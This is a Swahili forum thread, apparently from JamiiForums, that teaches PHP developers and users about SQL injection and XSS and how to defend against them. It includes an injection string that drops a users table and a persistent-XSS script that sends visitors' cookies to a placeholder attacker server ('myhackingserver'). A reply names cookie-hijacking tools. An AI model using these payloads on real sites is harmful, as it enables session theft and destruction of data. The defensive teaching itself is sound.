Tujuzane attacks mbalimbali zinazoweza kufanya website na watumiaji wake wakadukiliwa (Hacked)

kali linux

kali linux

JF-Expert Member
May 21, 2017
1,996
5,052
Hello bosses,

Nimeamua kuleta uzi huu kwa sababu mbalimbali ikiwemo ongezeko la matukio ya hacking kwenye website mbalimbali, na pia wizi wa data mbali mbali za watu (watumiaji wa websites).

Natumaini uzi huu utawasaidia developers hasahasa PHP WEB DEVELOPERS (website zetu za php zinatia huruma kwa kweli) ili waweze kujua jinsi ya kujikinga na kufahamu tatizo kubwa linalofanya website zao kuwa katika hatari ya kudukuliwa. Lengo hasa ni kuwafahamisha watumiaji wa websites zozote zile jinsi ya kujikinga na wizi na hatari nyingine mtandaoni.

Pia nakaribisha wale wote watakaoweza kuwa tayari kuchangia na nipo tayari kukosolewa (ila uwe na uhakika practically ili twende sawa) ili wote tujifunze jinsi ya kujikinga na hacking za kizembekizembe kama zinazotokea saahivi, ifikie hatua hata hacker akitaka kuhack site yako basi na yeye aseme kweli wewe developer ulijitahidi kiasi fln.

PIA KAMA WEWE NI PHP DEVELOPER AU UNA MPANGO WA KUJIFUNZA PHP SIKU ZA BAADAE, BASI NAKUSHAURI UFATILIE HUU UZI HADI MWISHO

WALE WATUMIAJI WA KAWAIDA NAO SOMENI COZ NITATUMIA LUGHA RAHISI SANA KUELEZEA


ATTACKS ZINAZOFANYWA ZAIDI DHIDI YA WEBSITES
HIZI ATTACKS NDIZO NIMEONA ZINATUMIKA ZAIDI HAPA BONGO KUPIGA WEBSITES MBALIMBALI KAMA VILE ILE YA RITA NA WENGINE.

1)SQL INJECTION
Kiufupi kabisa sql injection ni ujanja wanaoutumia hackers kufanya vitu mbalimbali kwenye database ya website fulani au mtandao wa kijamii. Microsoft na makampuni mengine makubwa kama sony tayari wanajua machungu ya sql injection, Pia hata hapa bongo attacks nyingi ni za sql injection

---->SQL INJECTION INATUMIKA KUIBA NINI/KUFANYA NINI
SQL injection inatumika:-
1)kuiba data za makampuni na wateja mbalimbali kutoka kwenye database yao mfano passwords na creditcard numbers
2)kufuta data kutoka kwenye database
3)kufanya bypassing[mfano kuingia kwenye system bila kuwa na vigezo vya kutosha)

---->SQL INJECTION INAFANYIKAJE
Kiufupi kabisa, sql injection inafanyika kwa kuingiza codes maalumu kwenye sehemu yyt ya input ndani ya website mfano baada ya mtu kujaza username kwenye login part ya jamiiforums, yeye anajaza hii kitu '
Code: 
'1'='1'; DROP users
, sasa hapo kama website haiko secured vizuri basi database table ya users inaweza kufutwa

TOOLS ZINAZOTUMIKA KUFANYA HII ATTACK NI
sqlmap(freeware) na Havij (hii inauzwa lkn pia kuna free version. hii ni kali zaidi na ilitengenezwa za hackers wa iran)

--->JINSI YA KUJIEPUSHA NA HII ATTACK
developers wanaweza kujkinga na hii attack kwa kuhakikisha kuwa user input yoyote ile inakua filtered kuondoa codes zozote zile
1)fanya proper character encoding kwenye site yako
2)tumia prepared statements (mysqli na PDO)
3)Jitahidi kutumia POST request method na punguza matumizi ya GET method

next time tutaendelea na hizi

1)CROSS SITE SCRIPTING XSS

2)DNS POISONING & DNS SPOOFING(hii inaweza kutumika kukuredirect ww kwenda kwenye domain name usiyotegemea, mfano unataka kwenda jamiiforums.com lkn nakupeleka jamiforums.com(BIG up kama umeona tofauti) kisha unalogin thn unakua umenipa password yako kiurahisi tu

3)COOKIE HIJACKING(hii inaweza kutumika kufanya maafa mengi japo watu wengi wanaikalia kimya, MAYBE KWA SABABU WATAALAMU WA HII NI WACHACHE)


Mwendelezo kuhusu CROSS SITE SCRIPTING - XSS attack
https://www.jamiiforums.com/threads...ake-wakadukiliwa-hacked.1596736/post-31872942


TUTAENDELEA.............




Kali linux.
 
safi sana thread nzuri hii
pia kwenye sql injection hii inawezwa kufanywa manual bila tools yoyote ile,.. ,,,,
 
COOKIE HIJACKING hii kitu wanatumia sema ubaya lazima uwe same network na victim sema tu ubaya hizi browser ndo wanapinga sana hii mambo

Ila firefox, explorer, safari, chrome (34%) update yao ya juz hii zaga inasupport na inabypass hsts security

Ila wanatumia ferret na hamster kusteal all saved items kwenye browsers
 
Uzi mzuri i think especially hata kwa anayetaka kuwa deep n network hacking..... Umecover sehemu kubwa
IMG_20190607_103025_560.jpeg
 
TUENDELEE NA ATTACK NYINGINE IJULIKANAYO KAMA "CROSS SITE SCRIPTING" (XSS)

XSS NI NINI???
XSS ni attack ambayo hacker anaingiza baadhi ya codes (sanasana Javascript codes) kwenye website fulani, ambapo hizo codes zitaenda kufanyakazi ya kucollect information mbalimbali kutoka kwenye browser ya mtumiaji kama vile cookies na stored password au credit card numbers, hacker akishapata hizo information hasa cookies zitamsaidia yy kuendelea na mashambulio mengine kama vle cookie session spoofing(hapa mfano naingia JF lkn system ya JF inanitambua kama Maxence melo na sio Kali linux) pia hizo data zinaweza kutumika kufanya replay attacks(tutaziongelea zaidi hizi baadae)


XSS INAFANYIKAJE????
Kwanza xss ina aina kama tatu hivi lkn ntaonesha ufanyikaji wa xss inayotumika sana, hii inajulikana kama 'Persistent XSS"

Kama nilivyotangulia kusema XSS inahusisha hacker kuingiza baadhi ya malicious codes kwenye website fln.

Tuchukulie huu mfano, nitatumia website inayoitwa crazyweb.com kwenye huu mfano.

Suppose hacker anataka kuingiza malicious codes zitakazo fanya xss then ataingia kwenye sehemu ya comments ya crazyweb.com (au sehemu yyt ile inayopokea input na kuionesha kwenye website) then kwenye part ya comment ataandika hizi codes

<script>
var userCookies = document.cookie;
//hapa kaweka cookies zote kwenye variable ya userCookies

window.location.href = "http://myhackingserver/xssdata.php?userData="+userCookies;
//hapa hacker atakua ametuma hizo cookies kwenye server yake kwa kutumia redirection fln hv
</script>

Sasa hizo codes zikiingia kama comments na zikakuta labda hio website haiko secured, yaan user input haziwi filtered kuondoa codes thn zitaingizwa kwenye database.

Watumiaji wengine watakao fungua ukurasa unaoonesha hio comment(iliobeba malicious codes) ndo watakua wameibiwa hivo details zao kwa njia ya cookie, yaan data zote hizo zinazohusu matumizi yako kwenye hio web na ambazo zilitunzwa kama cookies ndo zitakua zimebebwa hivyo, hii inaleta hatari zaidi endapo hio website ni social network au online market. XSS inaweza kubypass "SAME ORIGIN POLICY"(hii inazuia scripts za website fln kuaccess data kama vle cookies za website nyingine kwenye browser.)


===>XSS INAWEZA KUZUILIWAJE??
Kiufupi kabisa, Ili kuzuia xss kwenye website yako, inabidi wewe kama developer usiamini user input yoyote, hivyo inabidi user input yyt ile iwe filtered kuondoa codes, mfano kwa wale wa php unaweza kutumia function ya htmlspecialchars(); ili kufilter data kabla hazijaingia kwenye database au kutumika popote pale
 
Johnny Impact said:
Kama nina blog nawezaje kujikinga na CROSS SITE SCRIPTING" (XSS)) attack?
Click to expand...
Jibu la swali lako litategemea kama ww ndo umeicode CRUD ya blog yako au kama unatumia wordpress/blogger/wix etc..(blog engines)
1)KAMA WW NDO CODER WA BLOG YAKO na pia hio blog inapokea input kutoka kwa mtumiaji (input kwa blogs zinawezakuwa Coments na page number) hakikisha hizo inputs unazifanyia filter vizuri ili zisiingize na kutunza malicious codes kwenye database yako ya comments
2)KAMA WW UNATUMIA BLOG ENGINE MFANO WORDPRESS/Blogger/Wix: Hapa hauna haja ya kuhangaika coz hao wenye hio Blog Engine wameshakufanyia kilakitu, ww kazi yako ni kuchagua template nzuri na kuupload contents. Unachoweza kuhangaikia hapo tu ni domain name yako na SSL certificate


Happy Blogging!!
 
You must log in or register to reply here.

Similar Discussions

Back
Top Bottom
Forums
New posts
Post thread
Back